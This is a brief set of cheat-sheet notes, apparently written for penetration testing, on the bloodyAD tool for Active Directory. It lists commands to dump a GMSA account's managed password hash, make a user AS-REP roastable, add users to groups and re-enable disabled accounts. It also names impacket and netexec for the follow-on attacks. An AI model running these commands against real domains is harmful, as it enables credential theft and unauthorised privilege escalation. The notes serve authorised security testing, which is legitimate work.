bloodyAD
1.0 Installation
git clone https://github.com/CravateRouge/bloodyAD
cd bloodyAD
python -m venv .venv
source .venv/bin/activate
2.0 Configuration
3.0 Usage
3.1 Attacking GMSA Accounts
bloodyAD --host dc.domain.local -d domain.local --dc-ip $ip -k get object 'GMSA01$' --attr msDS-ManagedPassword
You can use the NTLM Hash to obtain a TGT with impacket-getTGT
3.2 Make User ASRepRoastable
bloodyAD --host dc.domain.local -d domain.local --dc-ip $dcip -k add uac $targetuser -f DONT_REQ_PREAUTH
You can ASRepRoast the user with netexec --asreproast
or impacket-GetNPUsers
3.3 Add user to group
bloodyAD --host dc.domain.local -d domain.local --dc-ip $dcip -k add groupMember 'targetgroup' 'usertoadd'
3.4 Activate account
bloodyAD --host dc.domain.local --dc-ip $dcip -d domain.local -k remove uac 'UserToActivate' -f ACCOUNTDISABLE